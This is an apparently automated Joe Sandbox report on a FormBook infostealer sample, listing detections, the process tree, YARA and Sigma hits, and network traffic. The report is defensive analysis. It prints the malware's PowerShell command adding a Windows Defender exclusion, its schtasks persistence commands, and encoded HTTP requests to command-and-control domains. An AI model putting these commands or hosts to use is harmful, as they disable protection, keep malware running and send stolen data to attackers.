Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JeouiaPf03mHSBH.exe

Overview

General Information

Sample name:JeouiaPf03mHSBH.exe
Analysis ID:1481954
MD5:7a591f965d4de7439413d7630026d9be
SHA1:de97ba629873de027142e506f3862d1d6debc30d
SHA256:6a56cbb193f28d62f0fa7f1ecbd0835e95e1aec40e2c08d9b2f839a0c4d76fab
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • JeouiaPf03mHSBH.exe (PID: 7080 cmdline: "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe" MD5: 7A591F965D4DE7439413D7630026D9BE)
    • powershell.exe (PID: 3264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7316 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6316 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • qRurKwDVhn.exe (PID: 5224 cmdline: "C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchIndexer.exe (PID: 7740 cmdline: "C:\Windows\SysWOW64\SearchIndexer.exe" MD5: CF7BEFBA5E20F2F4C7851D016067B89C)
          • qRurKwDVhn.exe (PID: 5064 cmdline: "C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8112 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • snTlRrBza.exe (PID: 7260 cmdline: C:\Users\user\AppData\Roaming\snTlRrBza.exe MD5: 7A591F965D4DE7439413D7630026D9BE)
    • schtasks.exe (PID: 7476 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7528 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7548 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • qRurKwDVhn.exe (PID: 5288 cmdline: "C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchIndexer.exe (PID: 7916 cmdline: "C:\Windows\SysWOW64\SearchIndexer.exe" MD5: CF7BEFBA5E20F2F4C7851D016067B89C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b7a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1429f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b7a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1429f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dd93:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16892:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          6.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            6.2.RegSvcs.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2eb93:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17692:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe", ParentImage: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe, ParentProcessId: 7080, ParentProcessName: JeouiaPf03mHSBH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", ProcessId: 3264, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe", ParentImage: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe, ParentProcessId: 7080, ParentProcessName: JeouiaPf03mHSBH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", ProcessId: 3264, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\snTlRrBza.exe, ParentImage: C:\Users\user\AppData\Roaming\snTlRrBza.exe, ParentProcessId: 7260, ParentProcessName: snTlRrBza.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp", ProcessId: 7476, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe", ParentImage: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe, ParentProcessId: 7080, ParentProcessName: JeouiaPf03mHSBH.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp", ProcessId: 6316, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe", ParentImage: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe, ParentProcessId: 7080, ParentProcessName: JeouiaPf03mHSBH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", ProcessId: 3264, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe", ParentImage: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe, ParentProcessId: 7080, ParentProcessName: JeouiaPf03mHSBH.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp", ProcessId: 6316, ProcessName: schtasks.exe

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-25T16:34:04.512340+0200
            SID:2050745
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T16:32:39.081573+0200
            SID:2022930
            Source Port:443
            Destination Port:49737
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T16:33:35.208840+0200
            SID:2050745
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T16:34:18.863880+0200
            SID:2050745
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T16:33:17.571339+0200
            SID:2022930
            Source Port:443
            Destination Port:49743
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2925371648.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2097970125.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.2448787756.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2923647911.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2925569784.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2098515296.00000000023F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2345762971.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.2925655670.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: JeouiaPf03mHSBH.exeJoe Sandbox ML: detected
            Source: JeouiaPf03mHSBH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: JeouiaPf03mHSBH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: SearchIndexer.pdb source: qRurKwDVhn.exe, 00000010.00000003.2034241645.0000000004673000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000003.2034639712.000000000473C000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2269804952.0000000000BDD000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2270146461.0000000002512000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: RAwd.pdb source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qRurKwDVhn.exe, 00000010.00000002.2923610433.00000000001EE000.00000002.00000001.01000000.0000000E.sdmp, qRurKwDVhn.exe, 00000012.00000000.2253128743.00000000001EE000.00000002.00000001.01000000.0000000E.sdmp, qRurKwDVhn.exe, 00000014.00000002.2923654418.00000000001EE000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: RAwd.pdbSHA256y source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.dr
            Source: Binary string: RegSvcs.pdb, source: SearchIndexer.exe, 00000011.00000002.2927079100.00000000036BC000.00000004.10000000.00040000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2924136902.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000014.00000000.2299855317.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2623311348.000000002E7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.2096368069.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.000000000322E000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2105365281.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.0000000003090000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2096508164.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2342536964.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.0000000003610000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2351477186.000000000346A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000006.00000002.2096368069.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.000000000322E000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2105365281.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.0000000003090000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2096508164.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2342536964.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.0000000003610000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2351477186.000000000346A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: SearchIndexer.pdbUGP source: qRurKwDVhn.exe, 00000010.00000003.2034241645.0000000004673000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000003.2034639712.000000000473C000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2269804952.0000000000BDD000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2270146461.0000000002512000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: RegSvcs.pdb source: SearchIndexer.exe, 00000011.00000002.2927079100.00000000036BC000.00000004.10000000.00040000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2924136902.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000014.00000000.2299855317.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2623311348.000000002E7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 4x nop then lea ecx, dword ptr [ebp-38h]0_2_063C4551
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 4x nop then jmp 063C4C06h0_2_063C4B7E
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 4x nop then jmp 08129746h0_2_08129864
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 4x nop then lea ecx, dword ptr [ebp-38h]7_2_06414551
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 4x nop then jmp 06414C06h7_2_06414B7E
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 4x nop then jmp 07BB89E6h7_2_07BB8B04
            Source: Joe Sandbox ViewIP Address: 162.159.134.42 162.159.134.42
            Source: Joe Sandbox ViewIP Address: 162.159.134.42 162.159.134.42
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /a337/?Srs=SuUCFGYLxfLSdB28yljyaXWxuxRxJPFERXqB8u1oV3tm3kjCrY/pbRNQPdsTXJeAd6y0uqoRophDcIlFpB6vZX+ChFce/OnhDgpWLzbAV64NbxtnxH/0gwE=&FX=9v8XFZ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.max500.buzzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
            Source: global trafficHTTP traffic detected: GET /w4k2/?FX=9v8XFZ&Srs=2mUcXvumjW0wgt1YpxGgI9tplSZcgAOBemrxBZvBawhLbtumtBi2Jym3H1IAKOuUn8QM7qLvtyDV0vTia9jGf+aRu2Xe28jNlZEC87Er+mbo2ND9VTXv/fQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.ancuapengiu28.comConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
            Source: global trafficHTTP traffic detected: GET /rk1u/?Srs=F12hDm1e4DcVWImHJ+2qK+It/RbJLRPuehC1dypgSVIG0HNIZQ44LV2EHRnZDsdrBZ/sqOYHya/GlclbNDRcdimcV6EHMYCTSyL+JOmQWa2hH4hFNXMeP+g=&FX=9v8XFZ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.goodneighbor.clubConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
            Source: global trafficDNS traffic detected: DNS query: www.sabhevillage.online
            Source: global trafficDNS traffic detected: DNS query: www.max500.buzz
            Source: global trafficDNS traffic detected: DNS query: www.ancuapengiu28.com
            Source: global trafficDNS traffic detected: DNS query: www.goodneighbor.club
            Source: global trafficDNS traffic detected: DNS query: www.lomos.top
            Source: unknownHTTP traffic detected: POST /w4k2/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.ancuapengiu28.comCache-Control: max-age=0Content-Length: 200Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.ancuapengiu28.comReferer: http://www.ancuapengiu28.com/w4k2/User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Data Raw: 53 72 73 3d 37 6b 38 38 55 61 6e 71 32 6d 4d 58 72 71 35 45 75 79 47 54 57 36 51 5a 76 46 77 54 33 68 44 52 53 68 44 53 47 35 66 6e 4b 51 56 50 53 65 69 6f 6a 42 6a 32 4c 68 50 76 5a 54 77 62 4b 66 62 39 72 4d 63 7a 30 49 7a 4a 74 67 48 4e 38 38 53 79 48 4e 75 75 56 76 72 49 76 6e 50 69 7a 38 6d 31 76 39 45 77 35 36 51 69 70 54 76 6a 69 64 48 70 53 69 58 39 6b 73 35 54 78 44 58 41 73 52 6b 42 6a 51 47 4b 67 79 70 44 4b 6f 79 51 4a 55 61 31 4c 33 2f 35 74 43 42 35 30 66 38 34 31 70 71 61 50 56 30 6d 37 4e 72 53 6d 41 30 4c 39 57 31 48 66 33 37 41 6b 54 61 6f 47 53 5a 48 4a 61 54 4c 48 51 3d 3d Data Ascii: Srs=7k88Uanq2mMXrq5EuyGTW6QZvFwT3hDRShDSG5fnKQVPSeiojBj2LhPvZTwbKfb9rMcz0IzJtgHN88SyHNuuVvrIvnPiz8m1v9Ew56QipTvjidHpSiX9ks5TxDXAsRkBjQGKgypDKoyQJUa1L3/5tCB50f841pqaPV0m7NrSmA0L9W1Hf37AkTaoGSZHJaTLHQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 14:33:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ywN6Klh2QZISVdPV%2FP0Kvhcx%2FM%2BEnWHvEgjrqN9RVOR4iVtoEXsr%2F4k%2F5AabKo43QWOeG7WuksXSkx8JOJ5OxO8z%2BI4E1l7IuiW0exOKpunvnNCf84lswdjQPBkmPr%2FG3c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a8cdda5e9e30f98-EWRalt-svc: h3=":443"; ma=86400Data Raw: 33 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 